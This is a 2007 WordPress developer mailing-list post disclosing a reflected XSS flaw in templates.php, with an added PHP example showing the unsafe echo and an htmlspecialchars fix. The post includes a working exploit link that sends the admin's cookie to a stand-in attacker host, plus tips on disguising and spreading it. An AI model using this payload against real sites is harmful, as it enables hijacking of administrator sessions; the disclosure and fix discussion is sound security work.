[wp-hackers] Reputed XSS issue with WordPress (templates.php)

Bas Bosman wordpress at nazgul.nu
Tue Feb 13 18:14:02 GMT 2007


> On 2/13/07, Alex Günsche <ag.ml2007 at zirona.com> wrote:
>> On Tue, 2007-02-13 at 17:44 +0100, Bas Bosman wrote:
>> > This can be triggered by users without the edit files capability. You
>> > just have to trick somebody with that capability to click that
>> > specially crafted link, by mailing a link or posting it in a comment
>> > for instance.
>>
>> Maybe so, but doesn't this fall into the "social engineering" category?
>>
>> With the same arguments, you could say that other managing actions which
>> are triggered by a GET request are vulnerable to XSS attacks.
>
> We protect this with a nonce and an AYS.  There's nothing more we can do.

If I can get you to click this link I have your WordPress login cookie,
giving me admin (if you're admin of course) on your blog, without AYS
and/or nonce saving you:
<a href="http://victim.com/blog/wp-admin/templates.php?action=update&file=<script>document.location.href%3d'http://evilhacker.com/grab.php%3fb='%2bescape(document.cookie);</script>&submit=Update+File+%C2%BB">Google</a>

I then code a grab.php which saves that info and redirects you to a safe
page (for example Google, if the user thought he clicked a Google link)
and you wouldn't even know your cookies are mine.

We should HTML-encode the file parameter from the query string before it
is used as raw output to the client again, to fix this.

Regards,
Bas Bosman (Nazgul)

P.S. If you think nobody clicks that link, what about a safe-looking link
to my site, where this code gets executed onload. Again most people
wouldn't notice. This attack is even worse, because I can take the
referrer and try some frequent WordPress install locations on that server,
thus making this attack work on more people instead of one.
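The fix Bas is asking for, shown as an added example in plain PHP (this is not WordPress code and not the patch the thread is about): a hypothetical template-editor form that echoes the `file` query parameter into the page raw, beside the same form with the value HTML-encoded first. The function names `render_form_unsafe`, `render_form_safe` and `contains_script_tag`, and the demo payload, are assumptions made for this example.

```php
<?php
// Added example, not WordPress code: reflecting a query parameter into
// HTML without encoding (the bug described above) vs. encoding it first.
// In templates.php the value would come from $_GET['file'].

// Vulnerable: $file goes into the markup exactly as the attacker sent it,
// so a value containing <script>...</script> is rendered as live markup
// and runs in the logged-in admin's browser session.
function render_form_unsafe(string $file): string
{
    return '<form method="post" action="templates.php">'
         . '<input type="hidden" name="file" value="' . $file . '" />'
         . '<p>Editing ' . $file . '</p>'
         . '</form>';
}

// Hardened: encode for the HTML context before output. ENT_QUOTES also
// encodes single quotes, so the value is safe inside either attribute
// quoting style as well as in element text. htmlspecialchars() is plain
// PHP and needs no framework helper.
function render_form_safe(string $file): string
{
    $safe = htmlspecialchars($file, ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="templates.php">'
         . '<input type="hidden" name="file" value="' . $safe . '" />'
         . '<p>Editing ' . $safe . '</p>'
         . '</form>';
}

// Simple check used by the demo: does the rendered markup still contain
// an un-encoded <script tag?
function contains_script_tag(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Constructed demo payload in the shape of the file parameter in the post
// (decoded), using a harmless alert instead of a cookie-stealing redirect.
$payload = '<script>alert(1)</script>';

var_dump(contains_script_tag(render_form_unsafe($payload)));
var_dump(contains_script_tag(render_form_safe($payload)));
echo render_form_safe($payload), "\n";
```

The nonce and AYS mentioned earlier in the thread do not help here: the injected script runs as soon as the page renders in the admin's session, before any form is submitted, so only encoding the reflected value at output time closes the hole.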
